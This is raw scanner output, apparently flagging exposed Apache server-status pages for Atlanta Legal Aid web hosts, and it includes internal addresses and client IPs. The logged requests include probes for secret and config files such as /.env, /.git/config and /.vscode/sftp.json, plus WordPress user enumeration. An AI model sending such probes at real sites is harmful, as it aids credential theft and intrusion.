/wp-content/plugins/revslider/public/assets/js/rs6.min.js H 40-53278820/1/1374_ 0.00010.00.0118.01 64.252.68.161http/1.1events.alas.org:8080GET /wp-content/plugins/js_composer/assets/lib/bower/skrollr/di 41-53279120/0/550W 0.00400.00.0011.24 130.176.137.155http/1.1intranet.alas.org:8080GET /wp-admin/upload.php?mode=list HTTP/1.1 42-53279134/19/529K 0.01004.30.108.99 70.132.4.67http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 43-53279180/0/727W 1.13300.00.009.01 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-53279230/0/645W 0.00300.00.006.60 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 45-53279241/1/861K 0.55038811.00.0014.10 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-53279252/3/534W 0.03003.40.047.09 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 47-53279263/5/489K 0.02104.50.036.20 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 48-53279270/0/507W 0.00300.00.007.33 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 49-53279284/4/365K 0.15004.40.004.74 70.132.4.67http/1.1on.alas.org:8080GET /_all_dbs HTTP/1.1 50-53279293/3/633W 0.00003.30.009.84 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 51-53279303/3/498W 0.03003.40.007.45 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-53279314/4/471K 0.00004.20.005.97 70.132.4.67http/1.1short.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 53-53279401/1/389K 0.56039141.00.009.73 70.132.4.67http/1.1intranet.alas.org:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0219bde710f
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 15-Apr-2023 00:03:26 UTC Restart Time: Saturday, 11-Mar-2023 06:50:09 UTC Parent Server Config. Generation: 35 Parent Server MPM Generation: 34 Server uptime: 34 days 17 hours 13 minutes 16 seconds Server load: 0.80 0.17 0.05 Total accesses: 772057 - Total Traffic: 24.8 GB CPU Usage: u31.95 s5.71 cu0 cs0 - .00126% CPU load .257 requests/sec - 8.7 kB/second - 33.7 kB/request 22 requests currently being processed, 0 idle workers KWKKKKKKKKKKKKKKKWW.K.K.......K................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-34130725/91/50489K 2.110045.61.931579.78 70.132.4.67http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 1-34130883/83/48798W 3.2900272.72.681536.11 70.132.4.67http/1.1short.alas.org:8080GET /server-status HTTP/1.1 2-34134353/13/48219K 1.5800232.50.331443.88 70.132.4.67http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 3-34135593/4/46771K 0.210186.90.091483.12 70.132.4.67http/1.1secure.alas.org:8080GET /server-status HTTP/1.1 4-34134405/15/47650K 0.400045.50.101591.01 70.132.4.67http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-34135651/5/44024K 0.86001.00.121399.90 70.132.4.95http/1.1short.alas.org:8080GET / HTTP/1.1 6-34134414/14/44641K 0.340052.70.481335.20 70.132.4.67http/1.1short.alas.org:8080GET /.env HTTP/1.1 7-34134883/7/42568K 0.560043.20.131308.23 70.132.4.67http/1.1secure.alas.org:8080GET /.env HTTP/1.1 8-34134613/10/40583K 1.560043.30.091269.66 70.132.4.67http/1.1short.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 9-34134894/7/37173K 1.39021911.90.161154.61 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 10-34135666/7/34186K 0.220011.00.011141.42 70.132.4.67http/1.1secure.alas.org:8080GET /.DS_Store HTTP/1.1 11-34136393/3/31247K 0.00003.20.001077.33 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 12-34136442/2/29588K 0.00002.40.00900.19 70.132.4.67http/1.1short.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 13-34136451/1/23485K 0.1302490.90.00856.26 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-34136541/1/22692K 0.00001.00.00707.46 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 15-34135974/5/20767K 0.120044.40.04676.30 70.132.4.67http/1.1secure.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 16-34136551/1/19801K 0.00001.00.00710.83 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 17-34136600/0/13142W 0.00000.00.00517.65 70.132.4.95http/1.1elearning.alas.org:8080GET / HTTP/1.1 18-34136610/0/11117W 0.00000.00.00443.95 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 19-34-0/0/11767. 0.00300.00.00454.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-34136195/5/10176K 1.3100274.90.27419.34 70.132.4.67http/1.1secure.alas.org:8080GET /info.php HTTP/1.1 21-34-0/0/10301. 0.00400.00.00386.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-34129674/93/9380K 3.56004.10.57383.67 70.132.4.67http/1.1short.alas.org:8080GET /.DS_Store HTTP/1.1 23-34-0/0/8381. 0.00200.00.00343.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-34-0/0/8527. 0.00485600.00.00285.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-34-0/0/4730. 0.01485100.00.00184.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-34-0/0/3247. 0.00485500.00.0086.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-34-0/0/3898. 0.36264400.00.00138.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-34-0/0/2776. 0.00485000.00.0087.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-34-0/0/2982. 0.00483900.00.00106.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-34130074/95/4244K 3.980049.52.03127.20 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 31-34-0/0/2550. 2.1626300.00.00100.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-34-0/0/2993. 0.00485200.00.00116.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-34-0/0/2838. 0.00485300.00.0092.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-34-0/0/2627. 0.17415100.00.0089.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-34-0/0/3320. 0.00484800.00.00112.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-34-0/0/3280. 1.42485800.00.00138.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-34-0/0/3039. 0.01484700.00.0094.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-34-0/0/2618. 0.00484900.00.0091.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-34-0/0/2981. 0.16415000.00.00101.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-34-0/0/1908. 0.00980900.00.0070.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-34-0/0/478. 0.00978300.00.0022.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-34-0/0/443. 0.00980200.00.0020.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-34-0/0/157. 0.00980300.00.002.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-34-0/0/289. 0.00980100.00.0014.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-34-0/0/233. 0.00978100.00.0016.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-34-0/0/196. 0.00980000.00.009.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-34-0/0/153. 0.00978000.00.001.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-34-0/0/112. 0.23871000.00.002.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-34-0/0/278. 0.00977900.00.008.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-34-0/0/428. 0.00977500.00.0010.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-34-0/0/111. 0.00977600.00.002.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-34-0/0/192. 0.00977800.00.0032.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-34-0/0/203. 0.00977700.00.0013.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-34-0/0/279. 0.00977300.00.0015.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-34-0/0/73. 0.00977400.00.000.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-34-0/0/99. 0.00983100.00.002.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021bd6167ca
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 15-Apr-2023 00:03:31 UTC Restart Time: Saturday, 11-Mar-2023 06:50:09 UTC Parent Server Config. Generation: 35 Parent Server MPM Generation: 34 Server uptime: 34 days 17 hours 13 minutes 21 seconds Server load: 2.58 0.55 0.18 Total accesses: 772239 - Total Traffic: 24.8 GB CPU Usage: u36.09 s6.18 cu0 cs0 - .00141% CPU load .257 requests/sec - 8.7 kB/second - 33.7 kB/request 95 requests currently being processed, 0 idle workers WWWWWWWWKKKKWWKKKKKWKWWWWKWWKWWWWWWWWWWWKWWWWWKWWWKWKKWWWWWWWWWW WWWWWWKKWWKWWWWWWWWWWWWWKWWKKSKKS............................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-34130729/95/50493W 2.111053.31.931579.78 70.132.4.67http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 1-34130880/88/48803W 3.54000.02.711536.14 70.132.4.95http/1.1esign.alas.org:8080GET / HTTP/1.1 2-34134356/16/48222W 2.0410333.00.431443.98 70.132.4.67http/1.1atlantalegalaid.org:8080GET /config.json HTTP/1.1 3-34135596/7/46774W 0.211090.00.091483.13 70.132.4.67http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 4-34134400/18/47653W 0.82000.00.151591.07 70.132.4.95http/1.1atlantalegalaid.org:8080GET /.env HTTP/1.1 5-34135656/10/44029W 1.241041.20.161399.94 70.132.4.95http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 6-34134415/15/44642W 0.342053.80.481335.20 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 7-34134886/10/42571W 0.561052.90.141308.24 70.132.4.67http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 8-34134615/12/40585K 1.62230072.00.111269.68 70.132.4.67http/1.1on.alas.org:8080GET /info.php HTTP/1.1 9-34134897/10/37176K 1.402815.40.171154.61 70.132.4.67http/1.1secure.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 10-341356610/11/34190K 0.30096723.30.021141.43 70.132.4.67http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 11-34136397/7/31251K 0.00007.30.011077.33 70.132.4.67http/1.1short.alas.org:8080GET /config.json HTTP/1.1 12-34136444/4/29590W 0.01105.00.00900.19 70.132.4.67http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 13-34136456/6/23490W 0.13106.10.01856.27 70.132.4.67http/1.1atlantalegalaid.org:8080GET /api/search?folderIds=0 HTTP/1.1 14-34136543/3/22694K 0.251150969.00.07707.52 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 15-34135978/9/20771K 0.120048.70.05676.31 70.132.4.67http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 16-34136553/3/19803K 0.252112368.90.07710.89 70.132.4.67http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 17-34136604/4/13146K 0.7000132.50.13517.78 70.132.4.95http/1.1short.alas.org:8080GET /login.action HTTP/1.1 18-34136613/3/11120K 0.310111542.40.04443.99 70.132.4.67http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 19-34136744/4/11771W 0.241035.30.03454.50 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 20-34136199/9/10180K 2.0100345.00.34419.41 70.132.4.67http/1.1short.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 21-34136755/5/10306W 0.251037.40.04386.75 70.132.4.95http/1.1survey.alas.org:8080GET /api/search?folderIds=0 HTTP/1.1 22-34129678/97/9384W 3.56108.30.57383.67 70.132.4.67http/1.1survey.alas.org:8080GET /about HTTP/1.1 23-34136802/2/8383W 0.241036.50.04343.69 70.132.4.67http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 24-34136852/2/8529W 0.251033.20.03285.49 70.132.4.67http/1.1survey.alas.org:8080GET /about HTTP/1.1 25-34136903/3/4733K 0.250069.30.07185.02 70.132.4.67http/1.1short.alas.org:8080GET /about HTTP/1.1 26-34136915/5/3252W 0.13105.50.0186.59 70.132.4.89http/1.1events.alas.org:8080GET / HTTP/1.1 27-34136921/1/3899W 0.49201.00.00138.04 70.132.4.67http/1.1atlantalegalaid.org:8080GET /config.json HTTP/1.1 28-34136933/3/2779K 0.371129468.80.0787.93 70.132.4.95http/1.1atlantalegalaid.org:8080GET /debug/default/view?panel=config HTTP/1.1 29-34137140/3/2985W 0.15100.00.00106.50 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 30-34130078/99/4248W 3.991054.02.03127.20 70.132.4.67http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 31-34137150/0/2550W 2.16200.00.00100.95 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 32-34137160/1/2994W 0.14100.00.00116.28 70.132.4.89http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 33-34137170/1/2839W 0.26000.00.0292.11 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.DS_Store HTTP/1.1 34-34137180/1/2628W 0.00200.00.0089.57 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 35-34137190/6/3326W 0.06200.00.01112.83 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 36-34137200/0/3280W 1.42200.00.00138.30 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 37-34137210/1/3040W 0.25100.00.0294.11 70.132.4.95http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 38-34137340/1/2619W 0.00200.00.0091.05 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 39-34137350/7/2988W 0.16100.00.05101.76 70.132.4.89http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-34137362/2/1910K 0.01202.40.0070.65 70.132.4.67http/1.1secure.alas.org:8080GET /config.json HTTP/1.1 41-34137690/3/481W 0.22000.00.0122.88 70.132.4.95http/1.1events.alas.org:8080GET / HTTP/1.1 42-34137700/2/445W 0.34000.00.0620.76 70.132.4.89http/1.1atlantalegalaid.org:8080GET /telescope/requests HTTP/1.1 43-34137753/3/160W 0.00103.10.002.89 70.132.4.95http/1.1survey.alas.org:8080GET /about HTTP/1.1 44-34137760/0/289W 0.00200.00.0014.05 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 45-34137770/2/235W 0.01200.00.0016.99 70.132.4.89http/1.1intranet.alas.org:8080GET / HTTP/1.1 46-34137941/1/197K 0.00101.10.009.35 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 47-34137950/1/154W 0.00100.00.001.95 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 48-34137960/1/113W 0.00100.00.002.49 70.132.4.95http/1.1elearning.alas.org:8080GET / HTTP/1.1 49-34137970/4/282W 0.01100.00.008.65 70.132.4.95http/1.1survey.alas.org:8080GET / HTTP/1.1 50-34137981/1/429K 0.00101.10.0010.41 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 51-34137990/2/113W 0.11000.00.042.31 70.132.4.89http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 52-34138001/1/193K 0.001811.50.0032.28 70.132.4.67http/1.1secure.alas.org:8080GET / HTTP/1.1 53-34138011/1/204K 0.00101.10.0013.69 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 54-34138250/1/280W 0.00100.00.0015.27
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02168dfa65d
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 15-Apr-2023 00:03:26 UTC Restart Time: Saturday, 11-Mar-2023 06:50:09 UTC Parent Server Config. Generation: 35 Parent Server MPM Generation: 34 Server uptime: 34 days 17 hours 13 minutes 16 seconds Server load: 0.80 0.17 0.05 Total accesses: 772057 - Total Traffic: 24.8 GB CPU Usage: u31.95 s5.71 cu0 cs0 - .00126% CPU load .257 requests/sec - 8.7 kB/second - 33.7 kB/request 22 requests currently being processed, 0 idle workers KWKKKKKWKKKKKKKKKWW.K.K.......K................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-34130725/91/50489K 2.110045.61.931579.78 70.132.4.67http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 1-34130883/83/48798W 3.2900272.72.681536.11 70.132.4.67http/1.1short.alas.org:8080GET /server-status HTTP/1.1 2-34134353/13/48219K 1.5800232.50.331443.88 70.132.4.67http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 3-34135593/4/46771K 0.210186.90.091483.12 70.132.4.67http/1.1secure.alas.org:8080GET /server-status HTTP/1.1 4-34134405/15/47650K 0.400045.50.101591.01 70.132.4.67http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-34135651/5/44024K 0.86001.00.121399.90 70.132.4.95http/1.1short.alas.org:8080GET / HTTP/1.1 6-34134414/14/44641K 0.340052.70.481335.20 70.132.4.67http/1.1short.alas.org:8080GET /.env HTTP/1.1 7-34134883/7/42568W 0.560043.20.131308.23 70.132.4.67http/1.1short.alas.org:8080GET /server-status HTTP/1.1 8-34134613/10/40583K 1.560043.30.091269.66 70.132.4.67http/1.1short.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 9-34134894/7/37173K 1.39021911.90.161154.61 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 10-34135666/7/34186K 0.220011.00.011141.42 70.132.4.67http/1.1secure.alas.org:8080GET /.DS_Store HTTP/1.1 11-34136393/3/31247K 0.00003.20.001077.33 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 12-34136442/2/29588K 0.00002.40.00900.19 70.132.4.67http/1.1short.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 13-34136451/1/23485K 0.1302490.90.00856.26 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-34136541/1/22692K 0.00001.00.00707.46 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 15-34135974/5/20767K 0.120044.40.04676.30 70.132.4.67http/1.1secure.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 16-34136551/1/19801K 0.00001.00.00710.83 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 17-34136600/0/13142W 0.00000.00.00517.65 70.132.4.95http/1.1elearning.alas.org:8080GET / HTTP/1.1 18-34136610/0/11117W 0.00000.00.00443.95 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 19-34-0/0/11767. 0.00300.00.00454.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-34136195/5/10176K 1.3100274.90.27419.34 70.132.4.67http/1.1secure.alas.org:8080GET /info.php HTTP/1.1 21-34-0/0/10301. 0.00400.00.00386.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-34129674/93/9380K 3.56004.10.57383.67 70.132.4.67http/1.1short.alas.org:8080GET /.DS_Store HTTP/1.1 23-34-0/0/8381. 0.00200.00.00343.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-34-0/0/8527. 0.00485600.00.00285.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-34-0/0/4730. 0.01485100.00.00184.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-34-0/0/3247. 0.00485500.00.0086.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-34-0/0/3898. 0.36264400.00.00138.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-34-0/0/2776. 0.00485000.00.0087.86 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-34-0/0/2982. 0.00483900.00.00106.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-34130074/95/4244K 3.980049.52.03127.20 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 31-34-0/0/2550. 2.1626300.00.00100.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-34-0/0/2993. 0.00485200.00.00116.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-34-0/0/2838. 0.00485300.00.0092.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-34-0/0/2627. 0.17415100.00.0089.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-34-0/0/3320. 0.00484800.00.00112.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-34-0/0/3280. 1.42485800.00.00138.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-34-0/0/3039. 0.01484700.00.0094.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-34-0/0/2618. 0.00484900.00.0091.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-34-0/0/2981. 0.16415000.00.00101.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-34-0/0/1908. 0.00980900.00.0070.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-34-0/0/478. 0.00978300.00.0022.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-34-0/0/443. 0.00980200.00.0020.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-34-0/0/157. 0.00980300.00.002.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-34-0/0/289. 0.00980100.00.0014.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-34-0/0/233. 0.00978100.00.0016.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-34-0/0/196. 0.00980000.00.009.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-34-0/0/153. 0.00978000.00.001.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-34-0/0/112. 0.23871000.00.002.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-34-0/0/278. 0.00977900.00.008.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-34-0/0/428. 0.00977500.00.0010.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-34-0/0/111. 0.00977600.00.002.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-34-0/0/192. 0.00977800.00.0032.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-34-0/0/203. 0.00977700.00.0013.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-34-0/0/279. 0.00977300.00.0015.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-34-0/0/73. 0.00977400.00.000.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-34-0/0/99. 0.00983100.00.002.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021cfa93241
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 15-Apr-2023 00:03:24 UTC Restart Time: Saturday, 11-Mar-2023 06:50:09 UTC Parent Server Config. Generation: 35 Parent Server MPM Generation: 34 Server uptime: 34 days 17 hours 13 minutes 14 seconds Server load: 0.80 0.17 0.05 Total accesses: 772024 - Total Traffic: 24.8 GB CPU Usage: u28.17 s5.08 cu0 cs0 - .00111% CPU load .257 requests/sec - 8.7 kB/second - 33.7 kB/request 16 requests currently being processed, 0 idle workers KWWKKKKKWWKK...K....W.W.......K................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-34130723/89/50487K 2.110043.41.921579.77 70.132.4.67http/1.1on.alas.org:8080GET / HTTP/1.1 1-34130882/82/48797W 2.550042.32.461535.89 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 2-34134351/11/48217W 0.83001.00.101443.66 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 3-34135592/3/46770K 0.21029982.70.081483.12 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 4-34134403/13/47648K 0.40028343.30.101591.01 70.132.4.67http/1.1survey.alas.org:8080GET / HTTP/1.1 5-34135652/3/44022K 0.1203168.80.021399.80 70.132.4.67http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 6-34134412/12/44639K 0.34023447.20.481335.20 70.132.4.67http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-34134882/6/42567K 0.56041742.20.131308.23 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 8-34134611/8/40581W 1.080041.30.081269.65 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 9-34134892/5/37171W 1.27006.70.161154.61 70.132.4.67http/1.1short.alas.org:8080GET /server-status HTTP/1.1 10-34135665/6/34185K 0.220010.00.011141.42 70.132.4.67http/1.1short.alas.org:8080GET /.DS_Store HTTP/1.1 11-34136391/1/31245K 0.00001.00.001077.33 70.132.4.67http/1.1short.alas.org:8080GET / HTTP/1.1 12-34-0/0/29586. 0.00800.00.00900.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-34-0/0/23484. 0.00700.00.00856.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-34-0/0/22691. 0.00600.00.00707.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-34135973/4/20766K 0.120043.30.04676.30 70.132.4.67http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 16-34-0/0/19800. 0.00500.00.00710.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-34-0/0/13142. 0.00400.00.00517.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-34-0/0/11117. 0.00300.00.00443.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-34-0/0/11767. 0.00100.00.00454.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-34136193/3/10174W 0.8300272.90.27419.34 70.132.4.67http/1.1intranet.alas.org:8080GET / HTTP/1.1 21-34-0/0/10301. 0.00200.00.00386.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-34129671/90/9377W 3.08001.00.57383.67 